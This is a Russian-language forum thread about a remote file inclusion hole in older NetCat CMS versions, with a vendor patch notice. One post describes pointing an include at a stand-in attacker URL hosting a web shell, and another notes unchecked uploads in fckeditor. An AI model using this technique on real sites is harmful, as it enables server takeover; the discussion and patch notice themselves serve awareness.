Дыра в неткат СБ

Тема в разделе "NetCat", создана пользователем InoffLine, 19 июл 2008.

Статус темы:
Закрыта.
  1. InoffLine

    InoffLine

    Регистр.:
    18 апр 2007
    Сообщения:
    573
    Симпатии:
    155
    взято отсюда - http://netcat.ru/support/ncforum/?Subdiv_ID=1&Topic_ID=827
     
    masterby нравится это.
  2. spa

    spa Читатель

    Заблокирован
    Регистр.:
    23 окт 2007
    Сообщения:
    112
    Симпатии:
    119
    Мда, интересно даже что там за символы скрыты.
    Но пацанам на Нулледе бояться нечего, ведь у нас более серьезная версия НэтКат. :D
    Почитал их форум, это про 2х версии.
     
  3. BACZ

    BACZ

    Регистр.:
    18 июн 2008
    Сообщения:
    608
    Симпатии:
    381
    это подмена не на текстовый файл а на путь к текстовому файлу.
    причем явно в строке типа
    include($DOCUMENT_ROOT/super-config.php);
    соответственно при поддержке URL в инклюдах - задается адрес к любому веб-шеллу в интернете с вопросительным знаком в конце, как-то вот так
    hxxp://тут-вражий-адрес.com/superwebshell.txt?

    вот статья например
    http://hack-expo.void.ru/groups/sds/html and txt/include_bug.html
     
  4. InoffLine

    InoffLine

    Регистр.:
    18 апр 2007
    Сообщения:
    573
    Симпатии:
    155
    Вполне возможно, что дыра во всех редакциях версии 2.2
    В смалл бизнесе врядли большие отличия в коде со старшими собратьями. у него только модулей нет
     
  5. Simpson

    Simpson

    Регистр.:
    22 июл 2007
    Сообщения:
    373
    Симпатии:
    36
    Что и при Safemode ON срабатывает?
     
  6. yakodzun

    yakodzun Прохожие

    2.2 2.3 2.4 до какого-то патча, независимо от редакции есть подобные уязвимости
    в fckeditor до какой-то версии была дыра (уязвимость была и на оф сайте редакотра)
     
  7. BACZ

    BACZ

    Регистр.:
    18 июн 2008
    Сообщения:
    608
    Симпатии:
    381
    fckeditor вообще большой друг человека - там в куче версий просто прямой upload почти любого барахла на сервак без особых проверок
     
  8. InoffLine

    InoffLine

    Регистр.:
    18 апр 2007
    Сообщения:
    573
    Симпатии:
    155
    Netcat в большинстве случаев нормально на сейф моде не работает.
    Неткат шаблоны и компоненты хранит в базе и эвалирует.
    А эвал плохо работает на сейф моде.
     
    Simpson нравится это.
  9. Schizophrenia21

    Schizophrenia21 Писатель

    Регистр.:
    11 май 2008
    Сообщения:
    4
    Симпатии:
    3
    Прислали письмо:

    Уважаемые коллеги!

    Мы выложили в свободный доступ обновления для старых версий системы, вплоть до 2.4. Это было вызвано тем, что за последние две недели мы стали свидетелями нескольких взломов сайтов наших пользователей, которые работали на старых версиях.
    Все взломы были сделаны через дыру, которая была закрыта больше двух лет назад, но люди ленятся обновляться. С начала этого года обновления предоставляются только пользователям с активным сроком техподдержки, но мы не хотим, чтобы взломы продолжались.

    Скачать обновления вы можете здесь: http://netcat.ru/forclients/update/patches/ , под своим логином и паролем. Настоятельно рекомендуем проверить всех ваших клиентов, если у кого версии 2.2 или 2.3 - обновить.

    Патч для Small Business будет чуть позже, об этом будет специальная рассылка.

    С уважением, Компания АИСТ
     
  10. Stas999

    Stas999 Писатель

    Заблокирован
    Регистр.:
    4 сен 2008
    Сообщения:
    4
    Симпатии:
    0
    Короче от НетКата надо избавлятся
     
Статус темы:
Закрыта.